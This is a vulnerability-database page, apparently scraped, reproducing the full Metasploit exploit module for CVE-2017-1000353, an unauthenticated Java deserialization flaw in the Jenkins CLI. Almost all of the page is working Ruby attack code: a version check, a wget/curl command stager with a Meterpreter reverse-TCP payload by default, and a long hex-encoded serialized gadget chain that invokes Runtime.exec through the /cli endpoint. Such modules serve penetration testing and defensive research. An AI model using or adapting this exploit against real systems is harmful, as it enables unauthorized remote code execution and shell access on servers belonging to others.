Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitSSD, Unknown, Shelby PaceMSF:EXPLOIT-LINUX-HTTP-JENKINS_CLI_DESERIALIZATION-
HistorySep 02, 2020 - 6:37 p.m.

Jenkins CLI Deserialization

2020-09-0218:37:41
SSD, Unknown, Shelby Pace
www.rapid7.com
15
JSON

An unauthenticated Java object deserialization vulnerability exists in the CLI component for Jenkins versions v2.56 and below. The readFrom method within the Command class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized SignedObject can be sent to the Jenkins endpoint to achieve code execution on the target.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Jenkins CLI Deserialization',
        'Description' => %q{
          An unauthenticated Java object deserialization vulnerability exists
          in the CLI component for Jenkins versions `v2.56` and below.

          The `readFrom` method within the `Command` class in the Jenkins
          CLI remoting component deserializes objects received from clients without
          first checking / sanitizing the data. Because of this, a malicious serialized
          object contained within a serialized `SignedObject` can be sent to the Jenkins
          endpoint to achieve code execution on the target.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'SSD', # PoC
          'Unknown', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],
          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],
          [ 'CVE', '2017-1000353']
        ],
        'Privileged' => false,
        'Platform' => 'linux',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [
            'Linux',
            {
              'Platform' => 'linux',
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DisclosureDate' => '2017-04-26',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ]
        },
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ])
      ]
    )
  end

  def check
    login_uri = normalize_uri(target_uri.path, 'login')
    login_res = send_request_cgi(
      'method' => 'GET',
      'uri' => login_uri
    )

    return Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res

    /Jenkins\s+ver\.\s+(?<version>\d+(?:\.\d+)*)/ =~ login_res.body
    return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version

    vers_no = Rex::Version.new(version)
    return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no < Rex::Version.new('2.54')

    Exploit::CheckCode::Detected
  end

  def exploit
    print_status('Sending payload...')
    execute_cmdstager(noconcat: true)
  end

  def format_payload(payload_data)
    formatted_payload = '74'
    formatted_payload << payload_data.length.to_s(16).rjust(4, '0')
    formatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
  end

  def execute_command(cmd, _opts = {})
    sess_uuid = SecureRandom.uuid
    sess_uri = normalize_uri(target_uri.path, 'cli')
    preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='

    send_request_cgi(
      {
        'uri' => sess_uri,
        'method' => 'POST',
        'headers' =>
        {
          'Side' => 'download',
          'Session' => sess_uuid
        }
      },
      nil, false
    ) # don't wait for response, and don't disconnect

    cmd = build_obj(cmd)
    send_request_cgi(
      {
        'uri' => sess_uri,
        'method' => 'POST',
        'data' => preamble + [ cmd ].pack('H*'),
        'headers' =>
        {
          'Side' => 'upload',
          'Session' => sess_uuid
        }
      }
    )
    sleep(2) # give buffer time between requests for processing
  end

  def build_obj(obj_data)
    payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'
    payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'
    payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'
    payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'
    payload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e'
    payload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726'
    payload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63'
    payload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6'
    payload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f'
    payload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537'
    payload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44'
    payload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6'
    payload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a'
    payload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7'
    payload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163'
    payload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6'
    payload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'
    payload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657'
    payload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8'
    payload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436'
    payload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c'
    payload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7'
    payload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f'
    payload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547'
    payload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c'
    payload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700'
    payload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078'
    payload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106'
    payload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013'
    payload_data << '75720013'
    payload_data << '5b4c6a6176612e6c616e672e537472696e673b'
    payload_data << 'add256e7e91d7b47'
    payload_data << '020000'
    payload_data << '7870'
    payload_data << '00000001'

    obj_data = format_payload(obj_data)
    payload_data << obj_data

    payload_data << '740004'
    payload_data << '65786563' # exec
    payload_data << '7571007e0'
    payload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578'
    payload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700'
    payload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878'
    payload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266'

    # This index is the length of the serialized
    # object that belongs to the SignedObject
    start_arr = payload_data.index('050daced')
    end_arr = payload_data.index('787571007e')
    new_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2)
    payload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0')

    payload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72'
    payload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000'
    payload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c'
    payload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707'
    payload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c'
    payload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136'
    payload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878'
    payload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078'
  end
end
JSON